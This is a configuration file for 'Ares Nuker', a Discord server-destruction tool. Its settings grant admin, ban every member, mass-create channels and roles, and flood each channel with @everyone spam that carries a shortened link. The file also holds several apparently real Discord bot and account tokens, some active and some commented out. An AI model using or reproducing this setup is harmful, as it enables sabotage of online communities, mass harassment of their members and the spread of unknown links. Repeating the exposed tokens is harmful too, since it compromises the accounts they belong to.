[bot]
; token = OTgwNDYzNzY1MDI1ODczOTMz.GvzPKy.a3y5YR_yKbz1-mLe3gWuxIbuJLUICfrs7Bu4GU
token = MTEyMjc4MDEyMTQyNjgzMzUyOA.GreEon.kSoKRQDriVo1Wete4CmXYDgcYOvC4gkRfPRqfM
; token = MTEyMTM2Mjc0ODkyMDU4MjE5NQ.G7FZ6x.PpFR8k47VGwYLZnfRaH2rT5I9shxipx4cdiglw
version = 1

[nuke]
guild_name = Ares Nuker On Top
channel_name = Ares Nuker On Top
role_name = Ares Nuker
webhook_name = Ares Nuker
ban_reason = Ares Nuker On Top
get_admin = true
ban_all = true
amount_channel = 100
amount_role = 50
amount_message_per_channel = 50
amount_guild = 20

[message]
; content = @everyone AresNuker on top
content = @everyone  https://bit.ly/3rbf4kK siuu

; use imgbb.com to host your image
[message.embed]
title = Ezz Nuke
description = AresNuker On Top
icon_url = https://i.ibb.co/zrLHDJC/icon.png
image_url = https://i.ibb.co/PG4zP2c/banner-ares.gif
color = 1491362

[discord]
user_id = 720206110715543632
white_users_id = []
white_guilds_id = []

[account]
token = MTExMzEyNjM5NDQyODM5OTY3Nw.GrAVVW.EFMzzzguQYks1Wg7OdN-Mcg_qyO4hOHX2q6D1k
; token = MTAxNTgyMDY5NzIxMTI0MDQ2OA.Gsc65J.Sy7PFKeBJ-Zl9pYYa4sIf4YPKWY19EmhQVtNYI
;token = MTEyMzQzMTA3NTAzMzY1MzMwOA.GMIDBo.tAJcf2YQt5TNvdSFQj81I0MJZa2vmbHcE3tF5w
guild_name = Ares Nuker On Top
amount_guild = 20